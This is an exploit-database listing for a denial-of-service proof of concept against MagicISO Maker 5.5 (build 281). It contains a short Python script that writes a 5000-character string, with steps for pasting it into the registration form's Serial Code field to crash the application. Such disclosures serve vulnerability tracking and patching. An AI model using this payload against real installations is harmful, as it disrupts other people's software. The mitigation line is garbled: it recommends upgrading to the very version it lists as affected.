Magic Iso Maker 5.5(build 281) - "Serial Code" Denial of Service (PoC)

vendor:

MagicISO Maker

by:

Alejandra Sánchez

7.8

CVSS

HIGH

Denial of Service

400

CWE

Product Name: MagicISO Maker

Affected Version From: 5.5(build 281)

Affected Version To: 5.5(build 281)

Patch Exists: YES

Related CWE: N/A

CPE: a:magiciso:magic_iso_maker:5.5

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10

2019

Magic Iso Maker 5.5(build 281) – “Serial Code” Denial of Service (PoC)

MagicISO Maker 5.5(build 281) is vulnerable to a denial of service attack when a maliciously crafted serial code is entered into the registration form. When the malicious serial code is entered, the application crashes.

Mitigation:

Upgrade to the latest version of MagicISO Maker 5.5(build 281) or later.

Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: Magic Iso Maker 5.5(build 281) - "Serial Code" Denial of Service (PoC)
# Date: 03/04/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.magiciso.com
# Software Link: http://www.magiciso.com/Setup_MagicISO.exe
# Version: 5.5(build 281)
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "MagicIso.py", it will create a new file "MagicIso.txt"
# 2.- Copy the text from the generated MagicIso.txt file to clipboard
# 3.- Open MagicISO.exe
# 4.- Go to Register
# 5.- Write any name in the field "User Name", e.g "Anonymous"
# 6.- Paste clipboard in the field "Serial Code"
# 7.- Click on button -> Register!
# 8.- Crashed

buffer = "\x41" * 5000
f = open ("MagicIso.txt", "w")
f.write(buffer)
f.close()